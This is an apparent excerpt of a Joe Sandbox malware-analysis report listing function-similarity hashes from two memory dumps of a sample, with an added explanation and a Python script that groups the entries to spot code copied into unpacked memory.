                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: in~x$kmbj$ydij
                                                                                                                                                                                                                                                                          • API String ID: 0-2624003027
                                                                                                                                                                                                                                                                          • Opcode ID: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                                                                                                                                                                                                                                          • Instruction ID: f79569228283954ad57b9a6cc496d73d61da5c1ffc761606bfa780fd5c95cafa
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A91245B5600A01CFC7248F24D8D16A7BBA2FF96314F18857ED4968B396E738E842CB55
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$V$e
• API String ID: 0-3964817793
• Opcode ID: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
• Instruction ID: 59230c03b5a3a3693ef44b30c97d38267524f76adfdce6de0efbbb4ceb4d7fde
• Opcode Fuzzy Hash: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
• Instruction Fuzzy Hash: 9822E77290C7408BD724DF38C4913AEBBD2ABD5324F194A2EE5E9973D1DA388941CB47
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$V$e
• API String ID: 0-3964817793
• Opcode ID: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
• Instruction ID: daab1252e0ede302c5111b3bef6e785a02b2cf7c06762f2d637e667f12f6f2d9
• Opcode Fuzzy Hash: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
• Instruction Fuzzy Hash: 4D22E43260D7908BD724DF3984943AEBBD2ABD5320F194A2ED5EE873D1D7748941CB42
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: 67$V3R5$dB
• API String ID: 0-2543814982
• Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
• Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
• Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
• Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: "w+y$?TUV$DX8Z
• API String ID: 0-3307990326
• Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
• Instruction ID: 42d08a021de3f72c2cb7fa87eb591ac07f85e20f86aec561d7416a97d7d4ee9e
• Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
• Instruction Fuzzy Hash: A081CE756007128FC728CF29C8A0A67B7F2FFA9710B19859DD8824FB65EB34E841CB55
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: .$GetProcAddress.$l
• API String ID: 0-2784972518
• Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction ID: 11c3ce01d4b21e2cad106f8ee3e8e99851c685a3892a5c7049a3e18a3c7c256e
• Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction Fuzzy Hash: 153139B6900609DFDB10CF99C880AAEBBF9FF48328F15514AD841AB310D771EA45CFA4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$8
• API String ID: 0-46163386
• Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
• Instruction ID: d40c633f6dc63a9644a0400b392de52ca6438bdc0a59f23ad90aea60c423d6c9
• Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
• Instruction Fuzzy Hash: BC7213716087409FD714CF18C880BABBBE1EB88314F04892EF9899B391D379D948DF96
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$8
• API String ID: 0-46163386
• Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
• Instruction ID: e79fe26171adb3b46b43858c4e65a021ff6669e4393bb9c02a4c81455905edf4
• Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
• Instruction Fuzzy Hash: D47227716083409FDB25CF18C890B6BBBE1AF88314F54892EF9998B391D375D949CF92
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: "*B$B*B
• API String ID: 0-3938277345
• Opcode ID: 78e285193c8325869296b3d11f9fc92a1318eae965f379fbd1dbd179110fea27
• Instruction ID: c0ff169c622c87bee100c6609ea31c9af3570951461718032b7520edbb3c94ef
• Opcode Fuzzy Hash: 78e285193c8325869296b3d11f9fc92a1318eae965f379fbd1dbd179110fea27
• Instruction Fuzzy Hash: 53421276A00211DFCB18CF68DC90AAEB7B2FF49310F598179E905AB395D734AD11CB84
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .$kl
                                                                                                                                                                                                                                                                          • API String ID: 0-2631956018
                                                                                                                                                                                                                                                                          • Opcode ID: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                                          • Instruction ID: 6e525d0f0299ed0e456b3adafb39e2bcab09d4ef44449d93680b2b5d8b67f0fb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FE1173A218709CBCB189F78EC5127A73F1FF4A741F4A887DD8818B2A1E7B99950C714
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: BE$de
                                                                                                                                                                                                                                                                          • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                          • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: BE$de
                                                                                                                                                                                                                                                                          • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                          • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction ID: 0e8e7438c804aa875dc6167410859db01fb727295b33fbb0f872cd46ad9a3b9a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61D1097265C3648BDB24DF2888516AFFFE2EFC1208F18492DE8D59B391D675C506CB82
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: )$IEND
                                                                                                                                                                                                                                                                          • API String ID: 0-707183367
                                                                                                                                                                                                                                                                          • Opcode ID: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
                                                                                                                                                                                                                                                                          • Instruction ID: 7a98d74c8d7b11716b93e7d51c3c372245116b5bf32aca3e0fd70816f8c0c3f7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86D19BB19083449FEB20CF29C841B5BBBE5AF94304F14892EF9999B381D375D949CB92
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: +oQ$?{;}
                                                                                                                                                                                                                                                                          • API String ID: 0-1414831546
                                                                                                                                                                                                                                                                          • Opcode ID: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                                                                                                                                                                                                                                          • Instruction ID: f7e0cf01948a060ca3ae4ae96257901d3d9473cfc3be429b8585dccf822635a3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCB1BFB4E043189FEB20DF68D942B9EBBB0FB45304F1081ADE158AB381D7758946CF96
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Fg$RU]l
                                                                                                                                                                                                                                                                          • API String ID: 0-3680832515
                                                                                                                                                                                                                                                                          • Opcode ID: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                                                                                                                                                                                                                                          • Instruction ID: 6f8db59bce85ef316af4e5eced37d01641f7d5c841364d3efc2c21db6cf2a903
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2171087120D3808BE7398F25D8A57EB7BD2EBD2304F58996DC0C987392DB78440ACB56
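The entries above are worth reading across dumps rather than one at a time: the same Opcode ID (4d61e13f…) is reported once in the PE-backed image at 00400000 and once in the region at 02490000 that the report marks "based on PE: false", with different Instruction IDs, which is what a function copied into freshly allocated memory by an unpacker looks like. The following is an added example, not part of the Joe Sandbox report or its tooling: a small parser for these Similarity entries that groups functions by Opcode ID across memory regions and flags IDs present in both PE-backed and non-PE-backed dumps. The input text is constructed from three entries copied from this page; the nibble-by-nibble comparison of Instruction Fuzzy Hashes is an assumed, illustrative metric and not Joe Sandbox's own similarity scoring.

```python
import re
from collections import defaultdict

# Constructed input: three Similarity entries copied from the report excerpt
# above, trimmed to the lines the parser reads.
REPORT_EXCERPT = """\
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Similarity
• API ID:
• String ID: BE$de
• API String ID: 0-1272349043
• Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
• Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
• Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
• Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Similarity
• API ID:
• String ID: BE$de
• API String ID: 0-1272349043
• Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
• Instruction ID: 0e8e7438c804aa875dc6167410859db01fb727295b33fbb0f872cd46ad9a3b9a
• Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
• Instruction Fuzzy Hash: 61D1097265C3648BDB24DF2888516AFFFE2EFC1208F18492DE8D59B391D675C506CB82
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Similarity
• API ID:
• String ID: )$IEND
• API String ID: 0-707183367
• Opcode ID: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
• Instruction ID: 7a98d74c8d7b11716b93e7d51c3c372245116b5bf32aca3e0fd70816f8c0c3f7
• Opcode Fuzzy Hash: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
• Instruction Fuzzy Hash: 86D19BB19083449FEB20CF29C841B5BBBE5AF94304F14892EF9999B381D375D949CB92
"""

# "• Key: value" bullet lines; the key is everything up to the first colon.
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
# The Source File value carries the dump name, load offset and PE-backing flag.
SOURCE_RE = re.compile(
    r"^(?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$"
)


def parse_records(text):
    """Split the report text into one dict per 'Memory Dump Source' entry."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            records.append(cur)
            continue
        m = FIELD_RE.match(line) if cur is not None else None
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            s = SOURCE_RE.match(value)
            if s:
                cur["dump"] = s.group("file")
                cur["offset"] = int(s.group("offset"), 16)
                cur["pe_backed"] = s.group("pe") == "true"
        else:
            cur[key] = value
    return records


def cross_region_opcode_ids(records):
    """Opcode IDs whose function body was found in more than one memory region."""
    regions = defaultdict(set)
    for r in records:
        if r.get("Opcode ID") and "offset" in r:
            regions[r["Opcode ID"]].add(r["offset"])
    return {oid: sorted(offs) for oid, offs in regions.items() if len(offs) > 1}


def image_to_heap_copies(records):
    """Opcode IDs present both in the PE-backed image and in a region that is
    not backed by a PE, i.e. code that also exists in unpacked/allocated memory."""
    pe, non_pe = set(), set()
    for r in records:
        oid = r.get("Opcode ID")
        if oid and "pe_backed" in r:
            (pe if r["pe_backed"] else non_pe).add(oid)
    return sorted(pe & non_pe)


def nibble_matches(h1, h2):
    """Assumed, illustrative metric: count positions where two equal-length
    Instruction Fuzzy Hash strings agree. Not Joe Sandbox's similarity score."""
    if len(h1) != len(h2):
        raise ValueError("fuzzy hashes differ in length")
    return sum(a == b for a, b in zip(h1.upper(), h2.upper())), len(h1)


if __name__ == "__main__":
    recs = parse_records(REPORT_EXCERPT)
    for oid, offs in cross_region_opcode_ids(recs).items():
        print(oid[:16], "seen at", [hex(o) for o in offs])
    print("image->non-PE copies:", [o[:16] for o in image_to_heap_copies(recs)])
```

Running it on the three entries reports the 4d61e13f… function at both 0x400000 and 0x2490000 and lists it as an image-to-non-PE copy; the )$IEND function appears only in the 0x2490000 region. Feed the full Similarity section in the same way to see which functions the unpacked region shares with the on-disk image.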
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: Fg$RU]l
• API String ID: 0-3680832515
• Opcode ID: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
• Instruction ID: dea7b580fab56d4a3e6b28817518e70d1316820d8d3609c21cae5b4d6d744a6d
• Opcode Fuzzy Hash: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D471C27121D3808BE7698F25C8617EBBBD6EFD2218F18996DC4D947392DB39400ADB13
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: O28+$h
                                                                                                                                                                                                                                                                          • API String ID: 0-657163135
                                                                                                                                                                                                                                                                          • Opcode ID: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                                                                                                                                                                                                                                          • Instruction ID: 943cae955c8ebe7c4b26d457fd1afafbf5e793f4316e69c7cecf830d1c43eab0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B561BE32B887258BD3149A38A8901B7F791EB55350F88473EDD96873C2E63C9D09C3DA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: @$ihgf
                                                                                                                                                                                                                                                                          • API String ID: 0-73152791
                                                                                                                                                                                                                                                                          • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                          • Instruction ID: 3b0646e180deb50f7a5a6296c2ddec3a8370d05c4e091f09dadf3508a8fc815a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 814127B56043018BD754CF28C88177BBBA2FFC2318F24862EE4499B390E735D805CB82
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Z\$^P
                                                                                                                                                                                                                                                                          • API String ID: 0-3724859648
                                                                                                                                                                                                                                                                          • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                          • Instruction ID: 6ef4766a72a4222674f0c3935a1b9cb7306982faf8762867b4605a3192e60b05
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E941C0B2911600CFC718CF28C9A2A62B7B2FF59314B1A859DD49B8F7A4E738E441CF55
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: AzB$`rB
                                                                                                                                                                                                                                                                          • API String ID: 0-365317308
                                                                                                                                                                                                                                                                          • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                          • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: AzB$`rB
                                                                                                                                                                                                                                                                          • API String ID: 0-365317308
                                                                                                                                                                                                                                                                          • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                          • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: c$
                                                                                                                                                                                                                                                                          • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                          • Opcode ID: 3e7173b7f35150ce67f14e4cf7677baf70ca03931a29a373c7b3ea58a15b4991
                                                                                                                                                                                                                                                                          • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
• Opcode Fuzzy Hash: 3e7173b7f35150ce67f14e4cf7677baf70ca03931a29a373c7b3ea58a15b4991
